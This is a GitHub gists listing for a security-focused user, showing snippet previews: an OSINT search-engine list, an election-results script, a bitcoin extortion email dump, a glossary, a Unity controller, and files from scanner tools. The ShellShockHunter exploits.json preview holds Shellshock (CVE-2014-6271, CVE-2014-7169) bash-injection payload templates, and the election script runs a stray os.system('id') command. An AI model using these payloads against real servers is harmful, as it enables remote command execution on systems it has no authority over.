Skip to content

Instantly share code, notes, and snippets.

View MrCl0wnLab's full-sized avatar
🏠
Working from home

Mr. Cl0wn - H4ck1ng C0d3r MrCl0wnLab

🏠
Working from home
View GitHub Profile
[
{
"label": "GEOSINTsearch",
"description": "Searches within posts from Twitter, Reddit and 4Chan and presents anything that contains a Google Maps link",
"value": "https://cse.google.com/cse?cx=015328649639895072395:sbv3zyxzmji"
},
{
"label": "Pasted tekst",
"description": "Look if any specifc text has been posted before",
"value": "https://cse.google.com/cse/publicurl?cx=013991603413798772546:nxs552dhq8k"
@MrCl0wnLab
MrCl0wnLab / eleicao2022.py
Last active October 2, 2022 20:53
resultado da eleiΓ§Γ£o
# O cΓ³digo Γ© do @BrennoSullivan, sΓ³ tΓ΄ colocando aqui pra ficar mais fΓ‘cil pro pessoal copiar.
# https://gist.github.com/oliverbot/5fa9ab1c86b0c4600b9d929e618f69f4
# https://twitter.com/BrennoSullivan/status/1576655828089974785/photo/1
# SΓ³ modifiquei para mostrar os outros cadidados, partidos e vice.
import requests
import json
import pandas as pd
import os
os.system("id")
@MrCl0wnLab
MrCl0wnLab / Bitcoin Address.log
Last active October 5, 2022 20:22
Full Dump email extorsΓ£o
Bitcoin Address
- 1PBgsz3bar9N64omj7APSY7rATQ2fyH6Vm
Bitcoin Abuse Database
- https://www.bitcoinabuse.com/reports/1PBgsz3bar9N64omj7APSY7rATQ2fyH6Vm
Block Chain
- https://www.blockchain.com/btc/address/1PBgsz3bar9N64omj7APSY7rATQ2fyH6Vm
This file has been truncated, but you can view the full file.
ABALROAMENTO – Choque entre duas ou mais - ou de uma com duas ou mais - aeronaves, em voo ou em manobra na superfΓ­cie, ou choque mecΓ’nico entre duas ou mais – ou de uma com duas ou mais – embarcaΓ§Γ΅es de qualquer espΓ©cie, ou seus pertences e acessΓ³rios, em porto, local de atracaΓ§Γ£o, ou via navegΓ‘vel,ou choque mecΓ’nico entre dois ou mais – ou de um com dois ou mais – veΓ­culos terrestres (viaturas e/ou equipamentos) e/ou seus apΓͺndices e acessΓ³rios,e do qual resultem danos. Ver COLISΓƒO.
ABANDONO DE POSTO – Abandonar, sem ordem superior, o posto ou lugar de serviΓ§o que lhe tenha sido designado, ou o serviΓ§o que lhe cumpria, antes de terminΓ‘-lo.
ABARRANCAGEM – Manobra realizada por navios ou embarcaΓ§Γ΅es, com ou sem encalhe intencional, nas margens de um rio ou lagoa, com a amarraΓ§Γ£o do navio a troncos ou a estruturas rΓ­gidas de fortuna.
@MrCl0wnLab
MrCl0wnLab / PlayerController.cs
Last active January 12, 2022 01:08
Controller Unity3D
using UnityEngine;
using System.Collections;
public class PlayerController : MonoBehaviour {
private float _speed;
public float walkSpeed = 2f;
public float runSpeed = 4f;
private Rigidbody _playerRigidbody;
private Vector3 _movimentVector3;
@MrCl0wnLab
MrCl0wnLab / python-qt-mudando-estilo-do-form.log
Created November 3, 2021 09:47
TREE python-qt-mudando-estilo-do-form.log
.
β”œβ”€β”€ form_qt_designer
β”‚ └── MainForm.ui
β”œβ”€β”€ main.py
β”œβ”€β”€ README.md
β”œβ”€β”€ screenshot
β”‚ β”œβ”€β”€ banner.png
β”‚ β”œβ”€β”€ Combinear.png
β”‚ β”œβ”€β”€ Darkeum.png
β”‚ β”œβ”€β”€ Fibers.png
@MrCl0wnLab
MrCl0wnLab / Nova versΓ£o do Scanner INURLBR! - estrutura.log
Created November 3, 2021 08:58
Nova versΓ£o do Scanner INURLBR! - estrutura
.
β”œβ”€β”€ inurlbr.php
β”œβ”€β”€ LICENSE
β”œβ”€β”€ modules
β”œβ”€β”€ output
β”œβ”€β”€ README.md
β”œβ”€β”€ resources
β”‚ β”œβ”€β”€ exploits.inurl
β”‚ β”œβ”€β”€ strings.validation.inurl
β”‚ β”œβ”€β”€ token.ipinfo.inurl
@MrCl0wnLab
MrCl0wnLab / ShellShockHunter Tool v1.0 assets-config.json
Created November 3, 2021 08:30
ShellShockHunter Tool v1.0 assets-config.json
{
"config": {
"threads": 10,
"path": {
"path_output": "output/",
"path_wordlist": "wordlist/",
"path_modules": "modules/",
"path_assets": "assets/"
},
"files_assets":{
@MrCl0wnLab
MrCl0wnLab / ShellShockHunter Tool v1.0 assets-exploits.json
Created November 3, 2021 08:28
ShellShockHunter Tool v1.0 assets/exploits.json
{
"DEFAULT":
"() { :; }; echo ; /bin/bash -c '_COMMAND_'",
"CVE-2014-6271":
"() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
"CVE-2014-6271-2":
"() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
"CVE-2014-6271-3":
"() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
"CVE-2014-7169":